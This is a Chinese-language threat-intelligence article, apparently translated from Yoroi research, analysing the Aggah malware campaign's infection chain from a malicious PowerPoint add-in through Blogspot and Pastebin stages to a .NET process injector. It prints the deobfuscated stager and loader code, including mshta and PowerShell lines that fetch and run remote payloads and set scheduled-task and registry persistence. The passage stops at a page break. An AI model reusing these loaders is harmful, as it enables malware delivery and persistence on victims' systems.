Aggah攻击活动是如何做到在不租用服务器的情况下,运行超过一年的僵尸网络?
2019年3月,网络安全公司Palo Alto Networks旗下情报威胁分析研究小组Unit 42公开披露了一起针对中东国家的网络攻击行动,并认为它与巴基斯坦黑客组织“蛇发女妖(Gorgon)”有关。
这起行动被命名为“Aggah”,源于攻击者用来托管Revenge远控木马的Pastebin网站账户名(“HAGGA”)以及攻击者用来分割发送到Revenge C2服务器的数据的字符串(“aggah”)。
不过很快,另一家网络安全公司Yoroi声称发现了一起与“Aggah”行动似乎存在关联的网络攻击行动,它们有着非常相似的感染链。
最大的区别在于,“Aggah”行动传播的恶意软件是Revenge远控木马,而新发现的行动传播的是AzoRult间谍软件。
在过去的一年中,Yoroi的研究人员不断跟踪Aggah的活动。期间Yoroi的研究人员还深入研究了Roma225攻击活动,因为攻击者在恶意软件的攻击过程中使用的就是 RevengeRAT,比如,Cybaze-Yoroi ZLab的研究人员对一款针对意大利汽车行业的间谍恶意软件进行了分析,该恶意软件就是利用了RevengeRAT。
最近Cybaze-Yoroi ZLab组织决定分析最新的Aggah活动样本,并跟踪其最新变化。
技术分析
下表是要分析的样本信息:
初始文件是Microsoft PowerPoint PPA文件,它实际上是一个插件文件,旨在向经典的PowerPoint演示文稿中添加新行为,在本案例中,就是添加一个恶意宏:
恶意宏代码段
PPA中的恶意代码滥用Microsoft mshta实用程序从BlogSpot平台下载网页。
Bit.ly链接的结果
HTML页面与以前的Aggah攻击的操作手法非常相似。在此案例中,blogspot帖子的名称为“20sydney new”,但是它使用了与以前相同的技巧:将javascript阶段代码隐藏在web页面中,这是一个特殊的代码片段,仅由mshta引擎解释和执行。
隐藏在Blogspot网页中并由MSHTA引擎执行的恶意代码
传递了“unescape()”函数的参数会导致另外两层编码的字符串,采用了一种“matrioska unecape混淆”。经过这些层之后,Yoroi的研究人员恢复了stager的恶意逻辑:
Set M_c = CreateObject(StrReverse("llehS.tpircSW"))
Dim L_c
L_c = StrReverse("exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc")
M_c.Run L_c, vbHide
set Ixsi = CreateObject(StrReverse("llehS.tpircSW"))
Dim Bik
Bik1 = "mshta http://pastebin.com/raw/JELH48mw"
Ixsi.run Bik1, vbHide
set nci = CreateObject(StrReverse("llehS.tpircSW"))
Dim xx
xx1 = "r ""mshta http://pastebin.com/raw/JELH48mw"" /F "
xx0 = StrReverse("t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs")
nci.run xx0 + xx1, vbHide
Set ll = CreateObject(StrReverse("llehS.tpircSW"))
no = StrReverse("mmetsaP/nuR/noisreVtnerruC/swodniW/tfosorciM/erawtfoS/UCKH")
ll.RegWrite no,"mshta http://pastebin.com/raw/NxJCPTmQ","REG_SZ"
self.close
代码段1
植入这些代码的目的旨在终止Word和Excel流程,此后,恶意软件立即再次利用mshta下载其他代码,这一次是通过pastebin代码段进行的。
恶意Pastebin片段
这篇文章的作者不再是Yoroi的研究人员之前分析中看到的“HAGGA”,而是“YAKKA3”:
YAKKA3 Pastebin用户的使用过程
该粘贴创建于2019年11月25日,在上个月的分析中可能已被多次编辑。过去,Aggah经常更改其粘贴内容,以修改恶意软件行为,并删除许多种类的恶意软件。在本文的案例中,其中一些人怀疑与Gorgon APT组有关。无论如何,在分析过程中,编码字符串的内容如下:
Set MVn = CreateObject(StrReverse("llehS.tpircSW"))
Mcn = "powershell do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Zhs3s')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Fk9yH').replace('*','0x')|IEX;[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f)"
MVn.Run Mcn, vbHide
self.close
代码段2
上面的脚本是一段VBS脚本,旨在运行其他一些Powershell加载程序。powershell脚本通过连接到google.com测试互联网连接,然后开始感染。该脚本将下载另外两个粘贴,第一个是PE文件,第二个是自定义.NET进程注入实用程序。
注入器(injector)
注入器的样本信息如下:
如代码片段2所示,通过其静态方法“ [vroombrooomkrooom] :: kekedoyouloveme('calc.exe',$ f)”调用注入器组件。该组件的惟一目的是将有效载荷注入另一个进程的内存中,如以下参数所示:
[1] [2] [3] 下一页